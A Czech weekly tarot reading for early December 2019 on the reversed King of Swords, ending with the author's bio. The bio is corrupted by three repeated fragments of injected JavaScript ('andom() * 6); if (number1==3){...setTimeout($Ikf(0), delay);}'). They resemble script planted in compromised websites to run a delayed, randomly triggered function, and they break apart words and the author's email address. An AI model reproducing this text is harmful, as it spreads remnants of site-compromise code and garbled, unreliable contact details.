Ezoterika, Magie,  Tarot

Týdenní čtení z tarotových karet: 2. – 8. prosince 2019

Karta týdne: Král mečů v obrácené pozici

Asi nebude náhoda, že na první adventní týden vyšla zrovna tato karta v obrácené pozici, navzdory tomu i mně překvapila.
Znamená často jakousi „tichou sílu“, nebo jinak „pokojnou sílu“. Říká, že pravděpodobně nebudete mít potřebu – nebo byste neměli mít – být nejhlasitější osobou v místnosti či nejviditelnější tam, kde byste viditelní podle jiných teď měli být. Na druhé straně byste však navzdory tomu měli „tichým“, nevtíravým, nezveřejňovaným způsobem přispívat těm méně šťastným a potřebným, sdílet svým vlastním, avšak nenápadným způsobem. Vaše síla a autorita budou teď vycházet zevnitř, z hloubky vaší neochvějné víry v sebe, z vašeho hlubokého spojení s vyššími hodnotami, a také z vaší volby stát si pevně za svou pravdou. Nedovolíte ostatním, aby vás odklonili z vytyčeného směru. Budete čerpat energii ze svého Vyššího Já a soustředíte se pouze na to, na čem vám skutečně záleží.
Podaří se vám smířlivou formou přesvědčit ostatní, aby plnili nejenom své vlastní osobní potřeby, ale podíleli se také na „celkovém dobru“. Neodepřete nikomu ani podporu, ani projevy čisté, lidské lásky, ať již v jakékoli její podobě. Svůj um a schopnosti budete v tomto období diplomaticky používat tak, aby se ostatní necítili podřadně anebo v nevýhodě.
Obrácený Král mečů může představovat rovněž někoho, kdo vstoupí do vašeho života a chytře, inteligentně vás podpoří.
Pozor však na manipulátory ve vašem okolí, právě v této době mohou za maskou dobrodinců hájit pouze své skryté zájmy a udělají vše, aby je dosáhly i na váš úkor.
Negativním aspektem obráceného Krále mečů může být něco, co vás zbrzdí. Budete trochu nerozhodní a tak propásnete hezkou nebo přínosnou příležitost a nebudete pak vědět, kam se vlastně hnout. Můžete rovněž postrádat mentální jasnost, takže nebudete vědět, co v jistých situacích udělat. Vaše myšlenky budou trochu rozptýlené, ačkoli jste obvykle racionální a rozvážní. V určitých chvílích a za určitých okolností se budete cítit ztraceni a nejistí. Pokud se budete bát nebo odkládat důležitá rozhodnutí, nedosáhnete nic, co byste dosáhnout chtěli nebo měli.

Výzva Krále mečů v obrácené pozici na tento týden
Král mečů dolů hlavou ukazuje, že víc než na úklid a stresující pobíhaní po supermarket byste měli myslet na pořádek ve svém nitru. A také se zklidnit se, najít v sobě tu „pokojnou sílu“, nenechat se zlákat vnějším pozlátkem a nedovolit nikomu, aby vás vyvedl z „míru duše“. Stanovte si dlouhodobé cíle, naplánujte si pečlivě každý krok a ten první udělejte nikoli až po Novém roce, nýbrž teď, hned.

Judita Katona Peschlová, zkušená kartářka, psychoterapeutka, terapeutka andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andělské terapie a lektorka rodinných konstelací, žurnalistka a spisovatelka; www.angelcity.cz, andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andele@gmail.com“>judita.andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andele@gmail.com